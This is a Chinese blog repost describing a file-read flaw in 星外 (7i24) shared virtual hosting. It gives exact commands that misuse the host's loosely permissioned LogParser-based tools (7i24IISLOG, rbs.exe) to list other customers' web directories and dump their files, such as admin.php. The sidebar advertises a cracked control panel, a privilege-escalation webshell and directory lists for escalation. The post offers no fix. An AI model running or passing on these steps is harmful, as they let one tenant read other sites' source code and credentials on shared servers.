星外虚拟主机跨web目录文件读取漏洞

最新推荐文章于 2024-08-08 16:15:46 发布
最新推荐文章于 2024-08-08 16:15:46 发布
阅读量162 收藏
点赞数
文章标签: 操作系统 php
原文链接:http://www.cnblogs.com/hookjoy/p/3959290.html
版权

星外虚拟主机跨目录读取文件漏洞,需要一定条件。

问题发生在以下文件,这些文件都没有严格的设置执行权限,当前的IIS用户能够顺利的利用它们执行命令:

c:\windows\7i24IISLOG.exe
c:\windows\7i24IISLOG2.exe
c:\windows\7i24IISLOG3.exe
c:\windows\7i24IISLOG4.exe
c:\windows\7i24tool.exe
c:\windows\rsb.exe

 这些文件貌似是星外处理日志、设置权限的,其中的7i24IISLOG.exe其实就是LogParser,LogParser是一款强大日志分析工具,下面利用它来列web目录:

c:\windows\7i24IISLOG  "select top 100 path from e:\host\*.*" -i:FS -rtp:-1

返回如下:

读取其中一个站的目录信息:

c:\windows\7i24IISLOG  "select top 100 path from e:\host\0233ab\*.*" -i:FS -rtp:-1

 

下面读取文件内容:

c:\windows\7i24IISLOG "select text from e:\host\0233ab\web\admin.php" -i:textline -rtp:-1

 

7i24IISLOG3.exe能够打包ISO文件,利用它同样的也可以列出目录文件信息:

c:\windows\7i24IISLOG3 e:\host\0233ab\web\ c:\windows\temp\123.rar

 

同样的还有rbs.exe

c:\windows\rbs -r -v 024dbjj e:\host\0233ab\web\*.*

 

转载于:https://www.cnblogs.com/hookjoy/p/3959290.html

weixin_34054866
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
星外虚拟主机管理系统破解版+主控被控 完美
05-15
星外虚拟 主机 管理系统 破解版 +主控 被控 完美运行,去除了验证文件,可直接使用
星外虚拟主机平台国内五大域名接口设置方法
09-30
星外虚拟主机平台作为一个高效且集成化的服务,提供了与国内五大知名域名注册商——新网、新网互联、商务中国、中国频道和万网的接口集成。这种集成允许用户在星外平台上无缝地进行域名查询和注册,无需跳转到各个...
星外虚拟主机管理系统提权漏洞 - cracer_CSDN
m0_67888657的博客
07-16 125
C:\7i24.com\iissafe\log\ '旧的星外可写,可以执行, 但是新的星外要不就是可写但是不能执行。HKEY_LOCAL_MACHINE\SYSTEM\LIWEIWENSOFT\INSTALLFreeHost\ '这个大家都知道,星外目录,思路是破解出来,sa连接不上,可以尝试社工root和远程。HKEY_LOCAL_MACHINE\SOFTWARE\MySQL AB\ ’这是找星外找出来的, 其他的自己找把,这个很关键的,星外的可写目录 其实吐司已经汇总了。
php mysql 星外_星外虚拟主机web目录文件读取漏洞
weixin_39919195的博客
02-28 102
星外虚拟主机目录读取文件漏洞,需要一定条件。问题发生在以下文件,这些文件都没有严格的设置执行权限,当前的IIS用户能够顺利的利用它们执行命令:c:\windows\7i24IISLOG.exec:\windows\7i24IISLOG2.exec:\windows\7i24IISLOG3.exec:\windows\7i24IISLOG4.exec:\windows\7i24tool.exec:...
星外虚拟主机提权拿服务器
收集盒 Book box
06-18 2325
 星外虚拟主机提权拿服务器 2011-04-24 12:37星外虚拟主机提权拿服务器 本次是对自己的IDC服务器的一次友情检测。本来服务器就已经拿了N次了。漏洞一直都放在那里。结果总有人拿到权限就炫耀。至于吗、?我本来就打算去换空间去了。 (还有仇家格我站,技术差我还不说什么。还到我面前吹,我承认自己服务器安全做的不好,你炫耀个撒。写出文章。给大家
秒杀星外虚拟机系统(星外虚拟机提权"0day")
weixin_34306593的博客
01-08 168
作者:Rootkit QQ: 24162807 首发:www.t00ls.net 星外虚拟机一直被认为很BT,其实我感觉还是很好搞,至少他支持aspx。找到有的执行目录一般99% 可以秒杀他 ,拿下服务器权限。 星 外可执行的目录最新版本C:\Documents and Settings\All Users\Application Data\Microsof...
星外虚拟主机提权目录
05-04
星外虚拟主机提权目录是指在星外虚拟主机环境下,通过特定路径访问或修改系统文件来提升权限的操作。这种操作通常涉及对服务器安全性的突破,因此具有一定的风险性。本文将详细解析给定的星外虚拟主机提权目录中的...
星外虚拟主机管理平台 3.5重要更新说明
10-01
### 星外虚拟主机管理平台 3.5重要更新说明 #### 版本变更与发布日期 星外虚拟主机管理平台本次更新至3.5版本(Beta2),发布时间为2005年7月14日。本次更新针对平台的各项功能进行了优化与改进,旨在提升用户体验...
星外虚拟主机管理系统
04-30
广州市星外信息科技有限公司(7i24.Com)是一个专业从事网络软件工程研究和推广的公司,其主要人员来自Microsoft China、GDIA等国内外知名企业和组织。7i24.Com是国内具 有影响力的互联网技术网站之一,网站成立于...
拒绝星外虚拟主机管理系统超级用户freehostrunat远程桌面提高安全
09-30
标题中的“拒绝星外虚拟主机管理系统超级用户freehostrunat远程桌面提高安全”涉及到的是一个针对特定系统(可能是Windows 2008或2003 Server)的安全措施,目的是增强系统的安全性,防止拥有超级用户权限的账号,如...
星外虚拟主机访问被控出现Unspecified error解决方法
09-30
星外虚拟主机访问被控出现Unspecified error解决办法,重装受控端许可证即可,不是受控端哦,是受控端许可证即可K的
星外-华众-新网-虚拟主机提权专用Webshell
08-23
支持星外、华众、N点、新网等虚拟主机提权,功能强大。
wdcp虚拟主机管理系统注入漏洞
收集盒 Book box
05-24 3952
日期:2014-05-13 | 来源:伟大娃娃 | 作者:人生注入点 | 287 人围观 wdcp服务器/虚拟主机管理系统登陆框注入漏洞。 passwd字段存在注入风险,选择限制字符长度为30.我想应该有大牛能绕过!   下面给出由伟大娃娃发布的漏洞利用脚本
一些提权思路分享
Coisini的博客
06-09 332
一:找可写目录 这个很关键的,星外可写目录 其实吐司已经汇总了。不过星外最近又更新了,各位颤抖把。。。 C:\7i24.com\iissafe\log\ ‘旧的星外可写,可以执行, 但是新的星外要不就是可写但是不能执行。。 建议大家把cmd 后缀 修改为 src,txt,com执行,有时候反而能成功 其他的可写目录相信大家已经收集了,这里我就不多说了,其次 华众的主机 在注册表就可以秒杀的...
星外虚拟主机php,星外虚拟主机提权拿服务器
weixin_42515045的博客
03-12 139
本次是对自己的IDC服务器的一次友情检测。本来服务器就已经拿了N次了。漏洞一直都放在那里。结果总有人拿到权限就炫耀。至于吗、?我本来就打算去换空间去了。 (还有仇家格我站,技术差我还不说什么。还到我面前吹,我承认自己服务器安全做的不好,你炫耀个撒。写出文章。给大家分享下。解决正在学习中。遇到困惑的人。BS。 谢谢朋友们提醒我.其实我都知道。谢谢你们的友情提醒)开始正题。拿到旁站权限。shell一个...
常见虚拟主机目录对照及星外提权目录
weixin_30535913的博客
08-31 192
常见虚拟主机目录对照 D:\virtualhost\web580651\www\ 新网虚拟主机 F:\usr\fw04408\xpinfo\ 万网虚拟主机 D:\hosting\wwwroot\Prim@Hosting虚拟主机 e:\wwwroot\longzhihu\wwwroot\...
常见虚拟主机目录对照表/星外提权目录
harryxlb的专栏
03-30 4177
常见虚拟主机目录对照表、星外提权目录 D:\virtualhost\web580651\www\          新网虚拟主机 F:\usr\fw04408\xpinfo\                  万网虚拟主机 D:\hosting\wwwroot\                    Prim@Hosting虚拟主机 e:\wwwroot\longzhihu\wwwro
Linux磁盘管理与文件系统(一):磁盘、MBR与分区和文件系统
最新发布
shyuu的博客
08-08 990
Linux磁盘管理与文件结构(一),理论讲解磁盘结构、MBR与分区和文件系统
星外主机提权技术详解
通过在之前上传的cmd.exe中运行VBS脚本,可以读取并显示IIS服务器的各种配置信息,包括但不限于Web服务实例、匿名用户身份、密码、绑定信息和虚拟目录路径等。这是通过GetObject("IIS://LocalHost/W3SVC")与后续的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值